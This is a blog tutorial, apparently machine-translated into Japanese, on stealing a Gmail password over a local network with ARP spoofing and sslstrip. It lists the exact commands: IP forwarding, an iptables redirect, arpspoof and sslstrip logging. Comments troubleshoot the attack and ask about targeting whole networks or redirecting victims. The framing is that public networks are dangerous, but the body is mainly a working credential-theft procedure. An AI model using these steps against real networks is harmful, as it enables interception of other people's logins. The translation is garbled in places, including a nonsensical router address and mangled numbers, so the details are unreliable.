こんにちはブロガー。
今日は、私たちの多くが好む安全でないネットワークに接続することがどれほど危険であるかについての小さなサンプルがあります。
今日は、SslstripでArpSpoofingを使用してGmailのパスワードを取得します。 環境をより制御するために、私は「testarp@gmail.com"。
そして、私は前文があまり好きではないので、ビジネスに取り掛かりましょう。
環境
このテストでは、次のようになります。
1.攻撃者: DebianWheezyを搭載しているのは私のデスクトップまたはデスクトップコンピュータです。 リポジトリからインストールできます sslストリップ y dsniff 持ってもらうために スプーフィング
2.犠牲者: 被害者は、ブラウザから自分のメールを見たいだけのAndroidタブレットです。
3.媒体: 真ん中は私の CiscoDPC2425ルーター
住所。
攻撃者のアドレス: 172.26.0.2
ルーターアドレス:007
被害者の住所: 172.26.0.8
攻撃:
この攻撃に対して最初に行うことは、転送をアクティブにして、コンピューターが被害者に気付かれることなく情報を転送できるようにすることです。 (それ以外の場合は、サービス拒否攻撃になります)
そのために使用します:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
ここで tail -f を実行すると、 desdelinux 私たちは情報をライブで直接見ます
では、どうすれば欲しいものを手に入れることができるでしょうか?
まず、タブレットにメールを入力しましょう。 ログインしていると、コンソールに何千ものものが表示されます。
これで完了したので、ファイルを開いてみましょう。desdelinux” ナノと一緒に
nano desdelinux
Control + Wを使用して、SECUREPOSTと呼ばれるものを検索します。
そして、私たちはこのようなものを見るでしょう。
目に見えないその巨大な線の中には、被害者の電子メールとパスワードがあります。
それで、トンネルの終わりに最終的に光が見えるまで、私たちは右に走ります。
別の機会に、これらの攻撃から自分自身を少し保護する方法を見ていきます。
よろしく
私はこの機会に、投稿が公開されたとき、コマンドが正しくなかったと言います。
最後のiptablesコマンドには、別の行にある8080がありません。 そして、arpspoofコマンドはすべて同じ行にありました。 各コマンドは異なる行にあります。
うまくいけば、編集者はそれを見て、それを修正することができます。
ご挨拶。
私はあなたが言及した修正をしました、それは大丈夫ですか?
優先エントリにコードを挿入する場合は、HTMLビューを使用し、記事が正しいことを確認してから、保留に送信してください。 ありがとうございました。
知識を持っていない私たちがとても脆弱であることを知るのはぞっとします。 内容がほとんどわからなくても、とても良い情報だと実感しています。 ありがとうございました!
よろしく
ただし、これは、攻撃者と被害者が同じネットワーク上にいる場合にのみ機能します。 いずれにせよ、(同じネットワーク上にある)HTTPSを使用して接続した場合、マシンを離れる前にデータが暗号化されているため、HTTPSを使用して接続することはできないようです。 HTTP(Sなし)で接続すると、ネットワークケーブルを見ても鍵が見えると思います。
それは本当ではない。 私はGmailキーをハッキングしていますが、Gmailがhttpsを使用していることに気付いた場合。 そう? 重要なのは、httpsは安全ですが、httpに依存しているということです。 したがって、それほど安全ではありません。
Sがスーパーマン用ではなく「安全」用であるほどhttpsについてあまり告白しないでください
httpsの有無にかかわらず動作します。より専門的なLinuxディストリビューションで試してみましたが、問題なく動作します。
Wi-Fiを盗む人にレッスンを教えるために正確に使用できます。 😀
それは、彼らがずっと前にChemaAlonsoのブログで言ったことと多かれ少なかれ似ています。
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
オスティア、それが何をするのか素晴らしいです!/そして、彼らが銀行口座をチェックするために行くとき、私がVPNを使うたびに彼らは私の妄想を言います…)。 ちなみに、コメントには皮肉な人がいるのを見る必要があります...結局それが盗んでいるのなら...
次に、独自のVPNサービスを作成して提供する方法についてのチュートリアルを受講する必要があります。
あなたがリンクしている話はとても面白いです、それは小説の本に値するようです、そしてこれは私が私の隣人のインターネットを使ったときを思い出させます、そして私は主題を知っていると言いますが、私はの本当の次元を決して見ることができなかったと思います幸いなことに、私が最後に持つ可能性のある危険性は、パスワードをWPA2に変更するだけでした。そこで、ISPとの私の話が始まりました。
そのため、タイトルにはSslstripの動作が示されています。
攻撃者が真ん中にいる限り、それは機能します
プリズムではどの波を使っていますか? -.-
いいえ。
リクエストを送信するのを待っていますXD
よろしく
良いポスト
興味深いことに、後で教育テストを行います...たぶんWiFiのパスワードを削除して、少し楽しむこともできます😛
万が一、ターゲットが要求したページに異なるページを送信するのと同じようなことができますか? たとえば、彼らはFacebookを開きたいのですが、私は彼らをGoogleにリダイレクトしますか? 😛
はい。 しかし、それはすべて非常に異なる役割です。
後で投稿するかもしれません。
非常に良い投稿です。これらのトピックは非常に教育的です。一部(私のような)はパブリックネットワーク(たとえば大学)に接続しているため、この攻撃に対抗できる必要があります。これを回避すると便利です。
ご挨拶!
それは私にはうまくいきませんでした🙁
https接続がサーバー証明書(マシンに証明書を取得すると、ブラウザーが暗号化を担当します)を使用して、80ではなくポート443(http)にリダイレクトするiptablesを使用して暗号化されるという事実を除けば、ここで何かが失敗しますこれはhttpsです
私もそう思った。 重要なのは、httpsは「安全」ですが、残念ながらhttpに依存しているということです。 したがって、sslstripはそれを利用して、ブラウザにhttps資格情報を使用していると認識させますが、そうではありません。
神聖なたわごと! しかし、ブラウザには「この証明書は疑わしいサイトなどからのものです」などの警告が表示されるはずです...私は間違いなくXDのテストを行う必要があります
いいえ、まったく何も出てきません。
それはついに私のために働いた
WEPネットワークにパスワードで接続していますが、とにかくパスワードが直接表示されました。
クエリ。 これと同じ手順を実行できますが、被害者がXNUMX人ではなく、ネットワークに接続されているすべてのコンピューターに対して実行できますか?
はい、できます。 しかし、私は実験をしていません。 自分で試してみて、あなたのやり方を教えてください。
これで私が得る唯一のことは、被害者のマシンがオフラインになることですが、sslstripは私に何も表示しません:/
しばらくの間ファイアウォールを無効にする必要があります。 または、少なくとも着信接続を有効にします。
プローブと私はFacebookページのユーザー名とパスワードしか見ることができませんでした。Gmailではログに結果が見つかりませんでした。また、arpspoof«arpspoof -i-t«の行だけが必要でした。 一方、被害者のマシンは一部のページを開くことができませんでした。 私は調査を続けます、それは非常に興味深いです。 Manjaroを使用する人のためのヘルプ、インストールするパッケージは、dsniff(ここではarpspoffです)、twisted、およびpython2-pyopensslです。 Sslstripはここからダウンロードできます: http://www.thoughtcrime.org/software/sslstrip/
それを実行するには$ python2 sslstrip.py
ご挨拶。
出てこなかったが、arpspoof行は次のとおりです。#arpspoof -i int -t ip-victim ip-router
私はあなたの言うことを正確にやっています:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
問題は、私がここにいる別のPCである被害者が、ルーターを再起動する必要があるポイントに接続されていないままになっていることです。どうすればよいですか。
私が仮想マシンで作業しているもう0つのことは、iwconfigコマンドを実行すると、wlan0が表示されず、ifconfigを実行しても表示されません。ただし、仮想マシンにインターネットがある場合は、ethXNUMXインターフェイスを使用します。